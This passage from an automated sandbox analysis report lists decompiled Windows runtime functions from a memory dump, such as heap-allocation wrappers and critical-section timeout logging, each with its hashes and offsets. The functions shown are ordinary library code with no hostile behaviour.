                          • Instruction ID: db4e83a53a58b4bad9f70db1198a7a359ef638b1086f9e4176c713305569a669
                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                          • Instruction Fuzzy Hash: 3EC01232180648BBCB126E85CC00F0A7B6AEB94B60F048410BA084A5608672ED70EA84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487DB40, Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0487DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04894620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                          0x0487db4d
                          0x0487db54
                          0x0487db5f
                          0x0487db56
                          0x0487db56
                          0x0487db5c
                          0x0487db5c

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction ID: 5687b4a3c034c6e6a5c1769b80b9314d6ac6b0f29473ad294706f2eb5cec5ca7
                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                          • Instruction Fuzzy Hash: 78C08C70280A00AAFB225F20CD01B0036E0BB00F09F8809A06301DA0F0DBB8EC02EA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0487AD30, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0487AD30(intOrPtr _a4) {

				return L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                          0x0487ad49

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction ID: 6b60b996ad08c9eff762d0b285ae5de565ec46e34cc9e658de05488f17498c3c
                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                          • Instruction Fuzzy Hash: 47C08C32080648BBCB126A49CD00F017B69E790B60F040020B6044A6618A72EC60D588
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A36CC, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048A36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                          0x048a36d2
                          0x048a36e8
                          0x048a36d4
                          0x048a36e5
                          0x048a36e5

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction ID: 3912f4319ff3e47496f915165436b2ac16628c32967ab9ea9796bf80c2378045
                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                          • Instruction Fuzzy Hash: E0C04CB5155840AAFA165B248D51B157294A740A65F680B547221C95E0E5A9AC11E504
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048876E2, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E048876E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                          0x048876e4
                          0x00000000
                          0x048876f8
                          0x048876fd

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction ID: 5426aee2f6dc55c34174e9e072d841b8cbc5a4fbadb6d1b41c58f2175371cfae
                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                          • Instruction Fuzzy Hash: F2C08C70155584AAEF2ABB08CE20B2036A0AF08708F680B9CAA01894A1C3A8B802C208
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04893A1C, Relevance: .0, Instructions: 10COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E04893A1C(intOrPtr _a4) {
				void* _t5;

				return L04894620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                          0x04893a35

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction ID: f75814ed63418e2d4af3305b4d8265a66d5b0dd3d7dafe366101629143b3af75
                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                          • Instruction Fuzzy Hash: 9FC08C32080648BBDB126E45DC00F017B69E790B60F040020B6044A5608572EC61D988
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04897D50, Relevance: .0, Instructions: 7COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E04897D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                          0x04897d56
                          0x04897d5b
                          0x04897d60
                          0x04897d5d
                          0x04897d5d
                          0x04897d5d

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction ID: 0f1bbb17e35d39e731cc9bd45ce4ea8ee8cf665ae45933fb6df6223d9a3b6d33
                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                          • Instruction Fuzzy Hash: C8B09234312980CFCF16DF18C080B1533E4BB44A40B8804D0E400CBA24D229E8009900
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0490FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E0490FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E048BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04905720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04905720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                          0x0490fdda
                          0x0490fde2
                          0x0490fde5
                          0x0490fdec
                          0x0490fdfa
                          0x0490fdff
                          0x0490fe0a
                          0x0490fe0f
                          0x0490fe17
                          0x0490fe1e
                          0x0490fe19
                          0x0490fe19
                          0x0490fe19
                          0x0490fe20
                          0x0490fe21
                          0x0490fe22
                          0x0490fe25
                          0x0490fe40

                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0490FDFA
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0490FE01
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0490FE2B
                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                          • API String ID: 885266447-3903918235
                          • Opcode ID: 20a0b823829cb717356a7588daa36e81e6ae92e81c655208267f9d8b8922b303
                          • Instruction ID: 85ed7d3b02af1f8053ba4283ade1fe4075435d133fe6709211cb1ac136f7109e
                          • Opcode Fuzzy Hash: 20a0b823829cb717356a7588daa36e81e6ae92e81c655208267f9d8b8922b303
                          • Instruction Fuzzy Hash: 42F0FC32600101BFE6201A45DC06F237B5EEB84730F154754F614555D1D9A2F920D6F4
                          Uniqueness

                          Uniqueness Score: -1.00%